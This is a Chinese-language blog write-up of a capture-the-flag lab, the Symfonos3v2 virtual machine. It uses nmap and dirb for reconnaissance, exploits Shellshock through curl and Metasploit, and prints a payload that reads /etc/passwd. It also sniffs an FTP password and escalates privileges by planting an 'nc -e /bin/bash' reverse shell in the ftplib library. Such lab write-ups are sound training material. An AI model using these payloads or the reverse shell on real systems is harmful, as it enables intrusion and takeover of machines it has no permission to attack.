symfonos3v2 打靶渗透

最新推荐文章于 2024-09-09 15:42:52 发布
最新推荐文章于 2024-09-09 15:42:52 发布
阅读量388 收藏 5
点赞数 4
文章标签: 网络 web安全 网络安全 经验分享 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/140857717
版权

一、信息收集

1、查看靶机的mac地址:

2、扫描靶机的ip地址:

nmap 192.168.13.0/24

3、扫描靶机开放的端口:

nmap -p- 192.168.13.151

4、访问靶机的80端口:

5、查看源代码有一句注释,翻译过来是你能破获地下世界吗,感觉underworld也是目录但是直接拼接访问行不通:

6、使用dirb扫描一下目录:

dirb http://192.168.13.151

7、访问一下目录:

8、发现这两个目录没有什么用,尝试将前面的首页发现的underworld加到目录后面访问:

9、发现有一个有页面,对这个页面进行目录扫描:

10、尝试拼接查看页面:

拼接了之后发现都是这个页面,只是页面显示的时间不一样,输出的信息很相似

11、发现和uptime命令输出的信息相似,此处存在破壳ShellShock漏洞:

12、执行payload查看是否成功,成功执行,且将结果回显到页面上:

curl -A " () { :;};echo;echo 123456;" http://192.168.13.151/cgi-bin/underworld/

13、尝试查看/etc/passwd文件内容,成功查看:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.13.151/cgi-bin/underworld

14、使用mfs搜索漏洞:

search CVE-2014-6271

15、使用msf获取shell:

use exploit/multi/http/apache_mod_cgi_bash_env_exec

set rhosts 192.168.13.151

set TARGETURI /cgi-bin/underworld

run

16、查看用户权限并获取一个交互式shell:

python -c 'import pty;pty.spawn("/bin/bash")'

二、提权

1、查看sudo权限,发现不存在:

2、执行一个ftp登录的python脚本:

tcpdump -i lo

得到用户和密码为hades:PTpZTfU4vxgzvRBE

3、使用ssh连接,发现依旧不存在sudo权限:

4、发现python脚本ftpclient.py只能查看,不能修改:

5、查看脚本:

6、发现此脚本导入了ftplib库,我们修改这个库的内容来获得权限:

import sys

import os

os.system("nc -e /bin/bash 192.168.13.128 6666")

7、kali开启监听:

nc -lvvp 6666

8、反弹成功,成功提到root权限:

9、查看txt文件:

搬砖小星
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
匕首3D打印尝试及刷Ender-3 V2固件刷写修复启动问题
fengcan
02-28 3495
周末跟孩子一起再玩了一下3D打印,过程中出现了白屏,本文记录一下尝试过程和修复白屏的方法。
AWS S3 对象存储 API 鉴权:签名版本的切换 v2 v4
回纹勾边宝相花团
07-30 4652
一、AWS S3 对象存储API 切换签名版本示例 示例代码摘抄自 DELL ECS EMC aws-java-workshop public static AmazonS3 getS3ClientWithV4Signatures() { System.out.println("Running with V4 Signatures:\n"); return getBasicS3ClientBuilder().build(); } public sta
自动驾驶技术-环境感知篇:V2X技术的介绍
Garvin的专栏
06-12 8万+
V2X技术概述 在前面的几篇文章分别介绍了自动驾驶在环境感知领域的相关技术点,主要介绍了如何通过雷达配合视觉技术实现车辆自身的智能。其实在环境感知方面,除了利用车辆自身的智能,还可以借助外部环境实现信息的获取,这一类技术统称为V2X技术。 V2X(Vehicle to Everything)技术又称为车用无线通信技术,本质上是一种物联网技术,V代表的是车辆,X代表的是道路、人、车、设备等一切可以连接的设备。 V2X的本质就是通过道路、行人、车辆间的协调实现整个道路运输的智能化。比如前面有车要.
SEED-XDS560v2 EMU1-3 led闪烁
Everett_y的博客
08-11 4742
led含义 led 含义 COM1 Ready指示灯 COM2 FPGA加载完成指示灯 COM3 系统boot指示灯 EMU1 Trace指示灯 EMU2 主机通信指示灯 EMU3 CCS连接指示灯 正常指示灯状态 COM3绿灯亮,仿真器正在加载程序。 COM3灭,COM1和COM2绿灯亮,程...
ID3v2 中文文档 (版本 2.3.0)
DREAMER
07-07 6764
此文档为官方非正式文档(好像没发现正式文档。。。。。) 对MP3 ID3 标签进行了详细说明,对解析标签很有帮助。 1. ID3标签信息(版本2.3.0) 1.1 文档说明 1.2 摘要 2. 约定 3. ID3v2概述 3.1 ID3v2标签头(header) 3.2 ID3v2扩展标签头(extended header) 3.3 ID3v2帧(frame) 3.3.
V2EX注册
wal1314520的博客
06-20 4730
最近注册了V2EX网站,觉得是个不错的论坛类的网站,很适合程序员,里面有很多有意思的帖子,所以就帮忙推广一下(也是因为推广有铜币拿,推广人和被推广人都有200铜币的样子),话不多说,上推广链接:https://www.v2ex.com/?r=wal0912 大家互利共赢,论坛里铜币是必不可少的,几乎所有的操作都要铜币,所以,能在开始就多一点,何乐而不为呢?期待你的加入 ...
h3c s5500 ssh v5 配置_H3C S5500 V2基本配置及配置命令
weixin_39917291的博客
12-21 3272
H3CS5500V2series基本配置一、配置交换的web界面sys(进入系统模式)[h3c]intvlan1(进入虚接口VLAN1)[h3c-int-vlan1]undoipaddress(清除原地址)[h3c-int-vlan1]ipadd2.10.3.1255.255.255.0(配置web界面ip地址)[h3c-int-vlan1]quit(返回上一级)[h3...
com.mchange.v2.c3p0.impl.AbstractPoolBackedDataSource getPoolManager
renaway的博客
02-18 8862
 最近在跟着做慕课网上的SSM校园商铺项目,刚把配置文件弄完,测试dao层就遇到了这样的错误。 这是控制台DEBUG信息:  DEBUG org.mybatis.spring.SqlSessionUtils - SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@78fa769e] was not registere...
C-V2X 技术介绍
yunfan
12-17 3万+
缩略词 C-ITS(Cooperative Intelligent Transportation System,协作式智能交通系统) C-V2X(Cellular-V2X,蜂窝车联网) 该技术在DSRC技术之后推出,目的同样是在车辆之间进行直接无线通信。C-V2X由3GPP组织定义,基于蜂窝调制解调器技术,其接入层与DSRC有着本质上的不同,完全不兼容。 D2D(Device to Device,设备到设备)是指物联网中设备直连通信技术。 DSRC(Dedicated Short Range Com
MP3文件ID3v2,ID3v2,APEv2标签读取
05-21
MP3文件ID3v2、ID3v2和APEv2标签是音频文件中用于存储元数据的标准,这些元数据通常包括艺术家姓名、歌曲标题、专辑名称、曲目编号、年份、流派等信息。在C语言和Linux环境下,理解和处理这些标签对于开发音乐播放器...
Llama3本地部署的解决方案
热门推荐
herosunly的博客
04-23 10万+
本文主要介绍了Llama3本地部署的解决方案,希望对学习大语言模型的同学们有所帮助。 文章目录 1. 前言 2. 配置环境 2.1 安装虚拟环境 2.2 安装依赖库 2.3 下载模型文件 3. 运行代码 3.1 修改文件 3.2 运行API 3.3 运行聊天界面 3.4 Python调用API 3.4.1 单轮对话 3.4.2 多轮对话
QT 读取mp3ID3V2 获取mp3专辑图片、专辑名称、标题、作者(一)
zhutou_的博客
10-03 3887
ID3V2是目前主流的mp3标签格式,特别是做为车载音乐播放器等一些无法连接到互联网的应用场景上,我们无法通过网络获得歌曲的信息,因此,读取ID3V2或者ID3V1标签就是一个很好的解决方案,这里主要记录的是在qt上通过代码实现这些信息的读取,借鉴了网上主流的方案,这里只是简单的介绍了下代码会用到的地方 一、ID3V2标签格式说明 1.1 标签头 在文件的首部顺序记录10个字节的ID3V2....
mp3-id3v1和id3v2详解
me_never的博客
10-20 2310
区分id3v1和id3v2 <script type="text/javascript" src="binaryajax.js"></script> <script type="text/javascript" src="id3.js"></script> <script type="text/javascript"> //id3v2文件 //var file = "Isobel Campbell - Are You Going to L
UDP协议
hyldzbg的博客
09-04 880
把当前要计算校验和的数据,每个字节,都进行累加,把结果保存到这两个字节的变量(校验和)中,过程中溢出也没关系,如果中间某个数据,出现传输错误,第二次计算的校验和就会和第一次不同(CRC这个算法其实不是特别靠谱,比如如果前一个字节大小少1,后一个字节大小多1,那么最后得到的校验和任然相同,但是数据可能已经不同了)。描绘这个数据报的报文长度(包含报头),这里的长度是指该报文有多少个字节,因为只有16位比特位的大小,因为数据传输可能会出错,所以需要一定的方法知道所传输的数据是否正确传输。
网络第五章:多路转接
qincjun的博客
09-05 581
2.HTTP1.1采用了长连接的方式来进行通信:建立连接,服务器响应完之后,不断开连接,活跃的用户对服务器发送请求,服务器都会正常响应;对不活跃的用户,不进行任何操作;events是分配好的epoll_event结构体数组.epoll将会把发生的事件赋值到events数组中 (events不可以是空指针,内核只负责把数据复制到这个events数组中,不会去帮助我们在用户态中分配内存).epoll通过这些值的设定,来监视fd的行为,如果fd做了这些行为,则会通过epoll_wait来反馈给上层,进行处理。
​数据链路层——流量控制&可靠传输机制 ​
最新发布
qq_25467441的博客
09-09 542
例题:一个信道的数据传输率为4kb/s ,单向传播时延为30ms ,如果使停止-等待协议的信道最大利用率达到80%,要求的数据帧长度至少为。设数据帧的长度为L比特,则发送方发送全部的数据需要时间:L/4。“停止-等待”就是每发送完一个分组就停止发送,等待对方确认,在收到确认后再发送下一个分组。因为是在讨论可靠传输的原理,所以并不考虑数据是在哪一个层次上传送的。发送方在一个发送周期内,有效地发送数据所需要的时间占整个发送周期的比率。数据链路层的流量控制是点对点的,而传输层的流量控制是端到端的。
200 Gb/s和400 Gb/s网络
dncsk的专栏
09-07 1374
116.200 Gb/s和400 Gb/s网络简介写在前面 :1.需要英文原文请自行官网下载2.本人无授权故亦不接受相关付费服务 如有商业性需求建议寻找有资质的书籍供应商购买3.翻译纯粹为爱发电,因为机器翻译所以错乱较多 建议参照英文原文对比使用 4.欢迎评论区提出建议或意见 原则上不删除评论 原则上不回复私信 和解呈现200GBASE-RPCSPMDIEEEStd802.3-2022,IEEE以太网标准第八节116.200Gb/s和400Gb/s网络116.1概述116.1范围本条款描述了200千兆位和4
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值